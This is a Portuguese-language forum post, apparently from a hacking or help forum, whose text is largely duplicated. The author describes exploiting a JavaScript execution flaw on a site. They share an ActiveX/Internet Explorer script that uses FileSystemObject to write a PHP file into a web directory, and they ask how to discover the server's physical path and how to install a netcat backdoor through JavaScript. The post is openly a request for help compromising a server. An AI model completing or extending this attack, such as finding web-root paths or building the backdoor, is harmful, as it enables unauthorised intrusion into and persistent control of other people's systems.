Ola pessoal,
estou tentando explorar uma falha que permite execução de JavaScript,
como JavaScript não permite upload, então tive a ideia de usar o ActiveX junto com o IE
com esse script é possível criar um novo arquivo dentro do servidor.
1 Problema
eu preciso saber o endereço físico do servidor para criar o arquivo no diretório do site.
é possivel descobrir esse endereço fisico do servidor?
exemplo
D:server/publichtml/www/site/imagens
Segunda ideia, instalar backdoor no servidor.
não sei como proceder nessa segunda ideia talvez de para criar e instalar o netcat via JavaScript
segue o script
OBS:
para rodar é necessário do Internet Explorer, ActiveX e habilitar os modos do activex no IE para que possa rodar corretamente o script.
qualquer informação é de grande ajuda.
obrigado.
estou tentando explorar uma falha que permite execução de JavaScript,
como JavaScript não permite upload, então tive a ideia de usar o ActiveX junto com o IE
com esse script é possível criar um novo arquivo dentro do servidor.
1 Problema
eu preciso saber o endereço físico do servidor para criar o arquivo no diretório do site.
é possivel descobrir esse endereço fisico do servidor?
exemplo
D:server/publichtml/www/site/imagens
Segunda ideia, instalar backdoor no servidor.
não sei como proceder nessa segunda ideia talvez de para criar e instalar o netcat via JavaScript
segue o script
Código:
<script> function WriteFile(){ try { var fso = new ActiveXObject("Scripting.FileSystemObject"); //Observe que sera criado um arquivo com a extensão php var fh = fso.CreateTextFile("\\Arquivos de programas\\VertrigoServ\\www\\lerjs\\topics.php", false); fh.WriteLine("Conteudo do arquivo"); fh.Close(); } catch(err){ var strErr = 'Error:'; strErr += '\nNumber:' + err.number; strErr += '\nDescription:' + err.description; document.write(strErr); } } //chamada da função WriteFile(); </script>
OBS:
para rodar é necessário do Internet Explorer, ActiveX e habilitar os modos do activex no IE para que possa rodar corretamente o script.
qualquer informação é de grande ajuda.
obrigado.
Comment